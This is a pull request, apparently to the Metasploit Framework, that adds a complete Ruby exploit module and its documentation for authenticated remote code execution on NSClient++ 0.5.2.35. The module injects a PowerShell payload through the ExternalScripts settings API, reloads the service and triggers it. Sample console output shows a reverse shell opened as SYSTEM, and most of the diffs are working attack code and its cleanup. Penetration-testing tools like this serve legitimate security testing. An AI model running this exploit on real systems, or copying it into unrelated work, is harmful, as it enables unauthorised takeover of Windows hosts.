### PR TITLE
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -1,12 +1,15 @@
-## Description
+## Vulnerable Application
+
+### Description
 
 This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.
-For this module to work, both web interface of NSClient++ and `ExternalScripts` feature
-should be enabled.
+For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.
 
-## Installation
+### Installation
 
-A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface and the `ExternalScripts` feature to allow the exploit to work.
+A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with
+this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
+and the `ExternalScripts` feature to allow the exploit to work.
 
 ## Verification Steps
 
@@ -22,13 +25,14 @@ List the steps needed to make sure this thing works
 
 ## Options
 
-**PASSWORD**
+### PASSWORD
 
 Set the PASSWORD of the admin account of NSClient++.
 
 ## Scenarios
 
-This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted). See the following output :
+This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).
+See the following output :
 
 ```
 msf6 > use nscp_authenticated_rce

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -12,13 +12,13 @@ A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient
 
 List the steps needed to make sure this thing works
 
-- 1. Start `msfconsole`
-- 2. `use exploit/windows/http/nscp_authenticated_rce`
-- 3. `set RHOST <target_host>`
-- 4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
-- 5. `check` to check if the targeted NSClient++ is vulnerable
-- 6. `set payload <choose_a_payload>` to set a specific payload to send
-- 7. `run` the module to exploit the vulnerability and start a shell
+1. Start `msfconsole`
+2. `use exploit/windows/http/nscp_authenticated_rce`
+3. `set RHOST <target_host>`
+4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
+5. `check` to check if the targeted NSClient++ is vulnerable
+6. `set payload <choose_a_payload>` to set a specific payload to send
+7. `run` the module to exploit the vulnerability and start a shell
 
 ## Options
 

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -1,0 +1,32 @@
+## Description
+
+This module allows an attacker with knowledge of the admin password of NSClient++
+to start a privilege reverse shell.
+For this module to work, both web interface of NSClient++ and `ExternalScripts`feature
+should be enabled.
+
+## Installation
+
+A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface and the `ExternalScripts` feature to allow the exploit to work.
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+- 1. Start `msfconsole`
+- 2. `use exploit/windows/http/nscp_authenticated_rce`
+- 3. `set RHOST <target_host>`
+- 4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
+- 5. `check` to check if the targeted NSClient++ is vulnerable
+- 6. `set payload <choose_a_payload>` to set a specific payload to send
+- 7. `run` the module to exploit the vulnerability and start a shell
+
+## Options
+
+**RHOSTS**
+
+Set the target host.
+
+**PASSWORD**
+
+Set the PASSWORD of the admin account of NSClient++.

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -25,3 +25,33 @@ List the steps needed to make sure this thing works
 **PASSWORD**
 
 Set the PASSWORD of the admin account of NSClient++.
+
+## Scenarios
+
+This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted). See the following output :
+
+```
+msf6 > use nscp_authenticated_rce
+[*] Using configured payload windows/x64/shell_reverse_tcp
+msf6 exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
+RHOST => x.x.x.x
+msf6 exploit(nscp_authenticated_rce) > set password easypassword
+password => easypassword
+msf6 exploit(nscp_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on y.y.y.y:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
+[+] The target is vulnerable. External scripts feature enabled !
+[*] Configuring Script with Specified Payload . . .
+[*] Added External Script (name: zqlmwevxef)
+[*] Saving Configuration . . .
+[*] Reloading Application . . .
+[*] Waiting for Application to reload . . .
+[*] Triggering payload, should execute shortly . . .
+[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200
+
+C:\Program Files\NSClient++>whoami
+whoami
+nt authority\system
+```

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -22,10 +22,6 @@ List the steps needed to make sure this thing works
 
 ## Options
 
-**RHOSTS**
-
-Set the target host.
-
 **PASSWORD**
 
 Set the PASSWORD of the admin account of NSClient++.

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -1,7 +1,7 @@
 ## Description
 
 This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell.
-For this module to work, both web interface of NSClient++ and `ExternalScripts`feature
+For this module to work, both web interface of NSClient++ and `ExternalScripts` feature
 should be enabled.
 
 ## Installation

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -1,6 +1,6 @@
 ## Description
 
-This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell.
+This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.
 For this module to work, both web interface of NSClient++ and `ExternalScripts` feature
 should be enabled.
 

--- a/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
+++ b/documentation/modules/exploit/windows/http/nscp_authenticated_rce.md
@@ -1,7 +1,6 @@
 ## Description
 
-This module allows an attacker with knowledge of the admin password of NSClient++
-to start a privilege reverse shell.
+This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell.
 For this module to work, both web interface of NSClient++ and `ExternalScripts`feature
 should be enabled.
 

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'TOKEN' => token },
       'uri' => normalize_uri("/query/#{key}")
     })
-  rescue StandardError
+  rescue StandardError => e
     print_error("Request could not be sent. #{e.class} error raised with message '#{e.message}'")
   end
 

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -189,10 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
     :failed_to_connect
   end
 
-  def execute_command(_cmd, _opts = {})
-    puts('bizarre')
-  end
-
   def check
     token = get_auth_token
 

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -65,9 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ]
   end
 
-  def generate_random_name
-    (0...rand(8..13)).map { ('a'..'z').to_a[rand(26)] }.join
-  end
 
   def configure_payload(token, cmd, key)
     print_status('Configuring Script with Specified Payload . . .')

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'NSClient++ 0.5.2.35 - Authenticated Remote Code Execution',
+        'Name' => 'NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution',
         'Description' => %q{
           This module allows an attacker with knowledge of the admin password of NSClient++
           to start a privilege shell.
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri('/settings/query.json')
     })
 
-    if !r.body.to_s.include? 'STATUS_OK'
+    if !(r&.body.to_s.include? 'STATUS_OK')
       print_error('Error configuring payload. Hit error at: ' + endpoint)
     end
 
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri("/query/#{key}")
     })
   rescue StandardError
-    print_status('Timeout exceeded. Assuming your payload executed . . .')
+    print_error("Request could not be sent. #{e.class} error raised with message '#{e.message}'")
   end
 
   def external_scripts_feature_enabled?(token)

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_auth_token
 
     if token != :failed_to_connect && token != :wrong_password && token != :no_token_found
-      rand_key = generate_random_name
+      rand_key = rand_text_alpha_lower(10)
       configure_payload(token, cmd, rand_key)
       reload_config(token)
       token = get_auth_token

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -6,11 +6,12 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Exploit::Remote::HttpServer
-  include Msf::Exploit::CmdStager
-  include Msf::Exploit::Powershell
-  prepend Msf::Exploit::Remote::AutoCheck
+  include ::Msf::Exploit::Remote::HttpClient
+  include ::Msf::Exploit::Remote::HttpServer
+  include ::Msf::Exploit::CmdStager
+  include ::Msf::Exploit::Powershell
+  prepend ::Msf::Exploit::Remote::AutoCheck
+  include ::Rex::Text
 
   def initialize(info = {})
     super(

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -1,0 +1,229 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Exploit::Remote::HttpServer
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NSClient++ 0.5.2.35 - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with knowledge of the admin password of NSClient++
+          to start a privilege shell.
+          For this module to work, both web interface of NSClient++ and `ExternalScripts` feature
+          should be enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'kindredsec', # POC on www.exploit-db.com
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '48360']
+          ],
+        'Platform' => %w[windows],
+        'Arch' => [ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'Windows',
+              {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :windows_powershell
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('PASSWORD', [true, 'Password to authenticate with on NSClient web interface', nil])
+    ]
+  end
+
+  def generate_random_name
+    (0...rand(8..13)).map { ('a'..'z').to_a[rand(26)] }.join
+  end
+
+  def configure_payload(token, cmd, key)
+    print_status('Configuring Script with Specified Payload . . .')
+
+    node = {
+      'path' => '/settings/external scripts/scripts',
+      'key' => key
+    }
+    value = { 'string_data' => cmd }
+    update = { 'node' => node, 'value' => value }
+    payload = [
+      {
+        'plugin_id' => '1234',
+        'update' => update
+      }
+    ]
+    json_data = { 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+
+    if !r.body.to_s.include? 'STATUS_OK'
+      print_error('Error configuring payload. Hit error at: ' + endpoint)
+    end
+
+    print_status('Added External Script (name: ' + key + ')')
+    sleep(3)
+    print_status('Saving Configuration . . .')
+    header = { 'version' => '1' }
+    payload = [ { 'plugin_id' => '1234', 'control' => { 'command' => 'SAVE' } } ]
+    json_data = { 'header' => header, 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+  end
+
+  def reload_config(token)
+    print_status('Reloading Application . . .')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/core/reload')
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        r = send_request_cgi({
+          'method' => 'GET',
+          'headers' => { 'TOKEN' => token },
+          'uri' => normalize_uri('/')
+        })
+        if !r.body.empty?
+          response = true
+        end
+      rescue StandardError
+        count += 1
+        if count > 10
+          print_status('Application failed to reload. Nice DoS exploit! /s')
+        end
+      end
+    end
+  end
+
+  def trigger_payload(token, key)
+    print_status('Triggering payload, should execute shortly . . .')
+
+    begin
+      send_request_cgi({
+        'method' => 'GET',
+        'headers' => { 'TOKEN' => token },
+        'uri' => normalize_uri('/query/' + key)
+      })
+    rescue StandardError
+      print_status('Timeout exceeded. Assuming your payload executed . . .')
+    end
+  end
+
+  def external_scripts_feature_enabled?(token)
+    endpoint = '/registry/control/module/load?name=CheckExternalScripts'
+    r = send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri(endpoint)
+    })
+
+    r.body.to_s.include? 'STATUS_OK'
+  end
+
+  def get_auth_token
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/auth/token?password=' + datastore['PASSWORD'])
+    })
+
+    if r.code == 200
+      begin
+        auth_token = r.body.to_s[/"auth token": "(\w*)"/, 1]
+        return auth_token
+      rescue StandardError
+        :no_token_found
+      end
+    else
+      :wrong_password
+    end
+  rescue StandardError
+    :failed_to_connect
+  end
+
+  def execute_command(_cmd, _opts = {})
+    puts('bizarre')
+  end
+
+  def check
+    token = get_auth_token
+
+    if token == :failed_to_connect
+      print_error("Can't access to NSClient web interface, maybe the web interface is not activated or something is wrong with the targeted host")
+      CheckCode::Safe
+    elsif token == :wrong_password
+      print_error('Unable to connect to NSClient web interface because the admin password given is wrong')
+      CheckCode::Unknown
+    elsif token == :no_token_found
+      print_error('Unable to get an authentification token, maybe the target is safe')
+      CheckCode::Unknown
+    else
+      print_good('Got auth token: ' + token)
+      if external_scripts_feature_enabled?(token)
+        print_good('External scripts feature enabled !')
+        CheckCode::Vulnerable
+      else
+        print_good('External scripts feature disabled !')
+        CheckCode::Safe
+      end
+    end
+  end
+
+  def exploit
+    cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)
+    token = get_auth_token
+
+    if token != :failed_to_connect && token != :wrong_password && token != :no_token_found
+      rand_key = generate_random_name
+      configure_payload(token, cmd, rand_key)
+      reload_config(token)
+      token = get_auth_token
+      trigger_payload(token, rand_key)
+    end
+  end
+end

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -53,11 +53,13 @@ class MetasploitModule < Msf::Exploit::Remote
             'Stability' => [ CRASH_SAFE ],
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
             'Reliability' => [ REPEATABLE_SESSION ]
-          }
+          },
+        'DefaultOptions' => { 'SSL' => true }
       )
     )
 
     register_options [
+      Opt::RPORT(8443),
       OptString.new('PASSWORD', [true, 'Password to authenticate with on NSClient web interface', nil])
     ]
   end

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include ::Msf::Exploit::Remote::HttpClient
-  include ::Msf::Exploit::Remote::HttpServer
   include ::Msf::Exploit::CmdStager
   include ::Msf::Exploit::Powershell
   prepend ::Msf::Exploit::Remote::AutoCheck
@@ -64,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('PASSWORD', [true, 'Password to authenticate with on NSClient web interface', nil])
     ]
   end
-
 
   def configure_payload(token, cmd, key)
     print_status('Configuring Script with Specified Payload . . .')
@@ -135,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
       rescue StandardError
         count += 1
         if count > 10
-          print_status('Application failed to reload. Nice DoS exploit! /s')
+          print_error('Application failed to reload. Nice DoS exploit!')
         end
       end
     end
@@ -219,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
       rand_key = rand_text_alpha_lower(10)
       configure_payload(token, cmd, rand_key)
       reload_config(token)
-      token = get_auth_token
+      token = get_auth_token # reloading the app might imply the need to create a new auth token as the former could have been deleted
       trigger_payload(token, rand_key)
     end
   end

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -157,6 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def external_scripts_feature_enabled?(token)
     endpoint = '/registry/control/module/load?name=CheckExternalScripts'
+
     r = send_request_cgi({
       'method' => 'GET',
       'headers' => { 'TOKEN' => token },

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -142,15 +142,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def trigger_payload(token, key)
     print_status('Triggering payload, should execute shortly . . .')
 
-    begin
-      send_request_cgi({
-        'method' => 'GET',
-        'headers' => { 'TOKEN' => token },
-        'uri' => normalize_uri('/query/' + key)
-      })
-    rescue StandardError
-      print_status('Timeout exceeded. Assuming your payload executed . . .')
-    end
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri("/query/#{key}")
+    })
+  rescue StandardError
+    print_status('Timeout exceeded. Assuming your payload executed . . .')
   end
 
   def external_scripts_feature_enabled?(token)

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -152,15 +152,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def external_scripts_feature_enabled?(token)
-    endpoint = '/registry/control/module/load?name=CheckExternalScripts'
-
     r = send_request_cgi({
       'method' => 'GET',
       'headers' => { 'TOKEN' => token },
-      'uri' => normalize_uri(endpoint)
+      'uri' => normalize_uri('/registry/control/module/load'),
+      'vars_get' => { 'name' => 'CheckExternalScripts' }
     })
 
-    r.body.to_s.include? 'STATUS_OK'
+    r.body.to_s.include?('STATUS_OK')
   end
 
   def get_auth_token

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
     elsif token == :wrong_password
       CheckCode::Unknown('Unable to connect to NSClient web interface because the admin password given is wrong')
     elsif token == :no_token_found
-      CheckCode::Unknown('Unable to get an authentification token, maybe the target is safe')
+      CheckCode::Unknown('Unable to get an authentication token, maybe the target is safe')
     else
       print_good('Got auth token: ' + token)
       if external_scripts_feature_enabled?(token)

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
               }
             ]
           ],
-        'Privileged' => false,
+        'Privileged' => true,
         'DisclosureDate' => '2020-10-20',
         'DefaultTarget' => 0,
         'Notes' =>

--- a/modules/exploits/windows/http/nscp_authenticated_rce.rb
+++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb
@@ -67,6 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def configure_payload(token, cmd, key)
     print_status('Configuring Script with Specified Payload . . .')
 
+    plugin_id = rand(1..10000).to_s
+
     node = {
       'path' => '/settings/external scripts/scripts',
       'key' => key
@@ -75,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     update = { 'node' => node, 'value' => value }
     payload = [
       {
-        'plugin_id' => '1234',
+        'plugin_id' => plugin_id,
         'update' => update
       }
     ]
@@ -96,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep(3)
     print_status('Saving Configuration . . .')
     header = { 'version' => '1' }
-    payload = [ { 'plugin_id' => '1234', 'control' => { 'command' => 'SAVE' } } ]
+    payload = [ { 'plugin_id' => plugin_id, 'control' => { 'command' => 'SAVE' } } ]
     json_data = { 'header' => header, 'type' => 'SettingsRequestMessage', 'payload' => payload }
 
     send_request_cgi({
@@ -122,6 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     count = 0
     until response
       begin
+        sleep(2)
         r = send_request_cgi({
           'method' => 'GET',
           'headers' => { 'TOKEN' => token },
@@ -133,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
       rescue StandardError
         count += 1
         if count > 10
-          print_error('Application failed to reload. Nice DoS exploit!')
+          fail_with(Failure::Unreachable, 'Application failed to reload. Nice DoS exploit!')
         end
       end
     end
@@ -162,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(endpoint)
     })
 
-    r.body.to_s.include? 'STATUS_OK'
+    r&.body.to_s.include? 'STATUS_OK'
   end
 
   def get_auth_token
@@ -189,22 +192,17 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_auth_token
 
     if token == :failed_to_connect
-      print_error("Can't access to NSClient web interface, maybe the web interface is not activated or something is wrong with the targeted host")
-      CheckCode::Safe
+      CheckCode::Safe("Can't access to NSClient web interface, maybe the web interface is not activated or something is wrong with the targeted host")
     elsif token == :wrong_password
-      print_error('Unable to connect to NSClient web interface because the admin password given is wrong')
-      CheckCode::Unknown
+      CheckCode::Unknown('Unable to connect to NSClient web interface because the admin password given is wrong')
     elsif token == :no_token_found
-      print_error('Unable to get an authentification token, maybe the target is safe')
-      CheckCode::Unknown
+      CheckCode::Unknown('Unable to get an authentification token, maybe the target is safe')
     else
       print_good('Got auth token: ' + token)
       if external_scripts_feature_enabled?(token)
-        print_good('External scripts feature enabled !')
-        CheckCode::Vulnerable
+        CheckCode::Vulnerable('External scripts feature enabled !')
       else
-        print_good('External scripts feature disabled !')
-        CheckCode::Safe
+        CheckCode::Safe('External scripts feature disabled !')
       end
     end
   end


### PR DESCRIPTION
## Description

This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privilege reverse shell.
For this module to work, both web interface of NSClient++ and `ExternalScripts`feature should be enabled.

## Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

List the steps needed to make sure this thing works

- 1. Start `msfconsole`
- 2. `use exploit/windows/http/nscp_authenticated_rce`
- 3. `set RHOST <target_host>`
- 4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
- 5. `check` to check if the targeted NSClient++ is vulnerable
- 6. `set payload <choose_a_payload>` to set a specific payload to send
- 7. `run` the module to exploit the vulnerability and start a shell

## Options

**RHOSTS**

Set the target host.

**PASSWORD**

Set the PASSWORD of the admin account of NSClient++.

## Demonstration

![image](https://user-images.githubusercontent.com/84333864/121038726-cc424a00-c7b0-11eb-9d3b-91df715543e0.png)
